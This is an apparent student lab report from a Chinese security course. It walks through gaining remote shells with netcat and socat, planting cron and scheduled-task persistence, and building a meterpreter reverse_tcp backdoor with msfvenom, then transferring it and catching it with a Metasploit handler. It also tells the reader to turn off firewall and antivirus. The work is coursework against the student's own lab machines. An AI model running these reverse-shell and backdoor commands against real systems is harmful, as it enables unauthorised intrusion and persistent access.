首页 > 其他分享 >20222321 2024-2025-1 《网络与系统攻防技术》实验二实验报告

20222321 2024-2025-1 《网络与系统攻防技术》实验二实验报告

时间:2024-10-22 17:33:50浏览次数:4  
标签:exe 主机 虚拟机 2024 2025 Shell 20222321 socat ncat

一.实验内容
(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
二.实验过程

1.使用netcat获取主机操作Shell,cron启动某项任务

(1)查看主机的ip

首先关闭主机和虚拟机的防火墙,在windows主机上下载ncat程序,并打开cmd,输入ipconfig指令查看主机的IP地址


由图可知,主机IP地址为172.16.178.63
(2)使用netcat进行连接并获取shell

虚拟机登入root用户,主机cmd进入ncat所在目录。
Win主机输入指令:ncat.exe -l -p 9000
Linux虚机输入指令:nc 172.16.178.63 9000 -e /bin/sh


win主机输入ls,够正常显示虚拟机下文件名

回到Windows主机的cmd中进行操作,切换到root模式,输入:
echo "* * * * * echo "20222321" > /home/kali/20222321.txt" > /var/spool/cron/crontabs/root
crontab -l
进入Linux虚拟机进入对应路径检查20222321.txt文件,发现修改成功:

2 使用socat获取主机操作Shell, 任务计划启动
(1)用socat连接Windows和kali
windows主机下载socat,通过cmd命令进入socat文件夹所在位置,输入如下命令:
socat.exe tcp-listen:9000 exec:cmd.exe,pty,stderr
kali虚拟机使用socat获取主机的操作shell,在虚拟机中开启监听:socat - tcp:172.16.178.63:9000

(2) 创建计划任务并启动
提前在windows主机中编写要计划启动的程序,代码如图所示:

在虚拟机中执行如下命令schtasks /create /sc minute /mo 1 /tn "test" /tr C:\Users\Desktop\20222321.exe
查看windows主机,可以看到执行的任务计划程序。

3 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
关闭windows的实时保护,同时关闭防火墙

(1)生成后门文件
使用ifconfig命令获取虚拟机IP:

可知,虚拟机IP为192.168.58.129
输入:msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.213.201 LPORT=2321 -f exe > 20222321backdoor.exe

主机进入ncat所在目录下,输入指令:
ncat.exe -lv 2321 > "E:\桌面\20222321backdoor.exe
虚拟机上输入指令:
nc 172.16.178.63 2321 < 20222321backdoor.exe(将生成的后门文件20222321backdoor.exe传给主机)
成功在桌面收到相应文件:

(3)配置监听模块
在Kali终端输入命令msfconsole,对监听模块进行配置:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.58.129
set LPORT 2321

输入exploit,使监听模块开始运行

三.问题及解决方案
(1)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell时文件无法传送到主机
解决:关闭防火墙以及杀毒软件
(2)crontabs root不执行
解决:不修改root文件,改为修改mykali文件
四.学习感悟、思考等
1.实验前需要提前关闭windows的安全防护
2.Windows自动任务无法执行,需要额外补充起始于哪个位置

标签:exe,主机,虚拟机,2024,2025,Shell,20222321,socat,ncat
From: https://www.cnblogs.com/yang07194/p/18493377

相关文章

  • 20241021 校测T1 致敬传奇捆绑测试题目(Perm) 题解
    题解:致敬传奇捆绑测试题目Perm来自不知道什么时候的回忆。给定正整数\(n\),一个\(1\simn\)的排列\(p\)是一个好排列,当且仅当使得对于任意\(1\lek<n\),都有\(\sum_{i=1}^kp_i>p_{k+1}\)。现在请你求出字典序第小的好排列\(p\)。\(1\len\le10^6\),\(1\lek\le......
  • Adobe LRC2024图像编辑软件下载安装
    目录软件简介系统要求Windows系统macOS系统安装步骤Windows系统1.运行安装程序2.完成安装与配置macOS系统1.运行安装程序2.完成安装与配置使用功能软件简介AdobeLightroomClassic(简称LRC)是一款专业的桌面图像编辑和管理软件,专为数码摄影师、图形......
  • 20222406 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    202224062024-2025-1《网络与系统攻防技术》实验三实验报告1.实验内容1.1实践内容正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧通过组合应用各种技术实现恶意代码免杀用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本......
  • 多校A层冲刺NOIP2024模拟赛11
    多校A层冲刺NOIP2024模拟赛11\(T1\)A.冒泡排序\(100pts/100pts/100pts\)将循环\(j\)提到外面,本质上是对\(a_{j},a_{j+k},a_{j+2k},\dots,a_{j+xk}\)进行排序迭代的过程。按下标模\(k\)的余数分别排序即可。点击查看代码inta[1000010];vector<int>b[1000......
  • 20222427 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实践内容1.1本周知识总结深入学习关于缓冲区溢出的基础知识。学习了关于后门的一些基础知识。1.2回答问题(1)杀软是如何检测出恶意代码的?病毒特征码检测加密文件分析基于行为检测的主动防御病毒云查杀(2)免杀是做什么?免杀,即Anti-AntiVirus(简写VirusAV......
  • 2024年软件设计师中级(软考中级)详细笔记【9】数据库技术基础(分值6分)
    目录前言第9章数据库技术基础(6分)9.1基本概念9.1.1数据库与数据库系统9.1.5数据库的三级模式结构9.2数据模型9.2.1数据模型的基本概念9.2.2数据模型的三要素9.2.3E-R模型9.2.4数据模型9.3关系代数9.3.1关系数据库的基本概念9.3.1.1关系模型9.3.25种基本的......
  • 【IEEE独立出版(ISBN号:979-8-3315-2986-4) | 连续多届稳定检索 | 大咖云集 | IEEE计算智
    重要信息大会网站:https://ais.cn/u/VRr6Rf【投稿参会】大会时间:2024年12月13-15日大会地点:中国-广州截稿时间:以官网信息为准出版检索:IEEE出版,见刊后由出版社提交至IEEEXplore, EI,Scopus检索组织单位征稿主题参会方式1、作者参会:一篇录用文章允许1名作者免......
  • 【西安理工大学主办,八大高校联合协办并重点推荐/品牌会议/JPCS独立出版,EI, Scopus稳定
    重要信息大会网站:https://ais.cn/u/2yymE3【投稿参会】截稿时间:以官网信息为准线下召开:2024年11月29日-12月1日会议地点:陕西·西安收录检索:EI,Scopus稳定双检索!征稿主题出版信息所录用的论文将以论文集形式递交JPCS出版,并提交至EICompendex,Scopus检索。......
  • 2024.10.22总结
    本文于github博客同步更新。今天打两场byd放三道黑是吧。第一场:A:CF1261F将区间拆分为\([x2^{i},(x+1)2^{i})\)的形式,发现两个区间中的数两两异或后形成的仍为一个区间,将A,B都拆分后区间两两异或会得到\(O(n^2\log^2n)\)个区间,取并即为答案,但复杂度无法接受。发现对......
  • 2024秋软工实践 爱码单车队展示与选题报告
    作业所属课程班级链接作业要求作业要求链接作业的目标开发一个基于LLM大模型接口的软件,为传统的软件赋予全新的体验和功能。团队名称爱码单车队成员1102201542--曾庆徽成员2102201211--池家益成员3102201302--毛震成员4102201420--林传昊成......